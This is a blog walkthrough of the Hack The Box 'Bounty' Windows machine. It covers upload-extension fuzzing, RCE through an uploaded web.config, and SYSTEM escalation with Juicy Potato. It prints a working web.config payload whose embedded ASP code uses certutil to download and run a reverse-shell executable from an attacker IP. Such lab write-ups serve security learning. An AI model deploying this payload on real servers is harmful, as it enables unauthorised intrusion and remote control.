CTF Walkthroughs, Hack The Box

Hack The Box – Bounty Walkthrough

May 9, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Windows machine that involved uploading a web.config file onto a Windows ASP web server to gain remote code execution and exploiting token impersonation to escalate privileges to system.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified only port 80 as open, so the next logical step would be to start enumerating HTTP.

Enumerating HTTP

When accessing the web server on port 80 through a browser, the following page comes up:

The above isn’t very helpful unfortunately, so the next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate

The scan has identified a transfer.aspx entry, visiting the file takes to a file upload page:

After trying a few common executable extensions such as asp and aspx without success, decided to instead use Burp intruder to identify which extensions are allowed. Intercepting the file upload request:

Sending the request to intruder:

Selecting the file extension as the only parameter to use replace with the payload:

Modifying the raft-small-extensions.txt wordlist from SecLists, removing the dot to avoid Burp from URL-encoding it:

This image has an empty alt attribute; its file name is image-73.png

In the payloads tab, selecting “Runtime file” as payload type and choosing the wordlist:

It appears that one of the allowed extensions is config:

In Windows ASP, web.config files allow you to you customize the way your site or page on your site behaves. This files may also allow to run arbitrary ASP code in the context of the web application. This article explains in-depth how these web.config files can be exploited

Exploiting Web.config to gain RCE

The first step is to generate some shellcode using MSFvenom with the following flags:

  • -p to specify the payload type, in this case, the Windows TCP reverse shell
  • LHOST to specify the localhost IP address to connect to
  • LPORT to specify the local port to connect to
  • -f to specify the format for the shell, in this case, exe

Creating the following web.config file, which will execute the Certutil utility and download and execute the reverse shell generated above:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
</appSettings>
</configuration>
<!--
<%
Set wShell1 = CreateObject("WScript.Shell")
        Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.10.14.3/exploit.exe C:\users\public\exploit.exe && C:\users\public\exploit.exe")
Response.write(output1)
%>
-->

Uploading the web.config file:

Setting up a Python web server to host the reverse shell:

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup

Navigating to the web.config file:

The reverse shell was successfully downloaded:

A call back on the listener was received, granting a reverse shell:

Privilege Escalation

When running “whoami /priv” on the box, it appears teh current user has the “SeImpersonatePrivilege”, which means that token impersonation could be exploited to escalate privileges:

Using Wget to download the Juicy Potato binary:

Using Certutil and the Python web server to transfer it to the victim machine:

A valid CLSID is required for the exploit to work, using the systeminfo command to check the Operating System:

A number of CLSID are available for Windows Server 2008 R2 on the Juicy Potato GitHub repository:

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup

Executing Juicy Potato using the following flags:

  • -l to specify the COM server listen port
  • -p to specify the program to launch, in this case, the previously created reverse shell
  • -t to specify the createprocess call, in this case, both CreateProcessWithToken and CreateProcessAsUser
  • -c to specify the CLSID, in this case, the one found in GitHub for Windows Server 2008 R2

The exploit successfully executed the reverse shell as system, granting a SYSTEM-level privileged shell.

Conclusion

This box was really, as it wasn’t the usual asp/aspx/ashx web shell upload, as it involved quite a bit of research to find out about web.config files and how to exploit them, I definitely learned something new doing this challenge and I am sure most of the other users who completed it did too.